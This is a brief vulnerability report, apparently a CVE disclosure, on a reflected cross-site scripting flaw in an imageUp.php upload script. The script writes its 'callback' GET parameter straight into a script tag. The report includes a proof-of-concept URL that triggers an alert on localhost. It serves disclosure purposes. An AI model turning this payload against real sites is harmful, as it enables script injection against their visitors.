CVE

testing environment：localhost

windows+edge+phpstorm+BurpSuitePro+apache2 + php5.6.9

1.vulnerability analysis

/php/imageUp.php

After the website requests the get parameter, it directly concatenates it into <script></script>, causing a reflective xss vulnerability

2.exploitation of vulnerability

payload：http://127.0.0.1/php/imageUp.php?callback=alert('xss')

This issue exists in all language versions of imageUp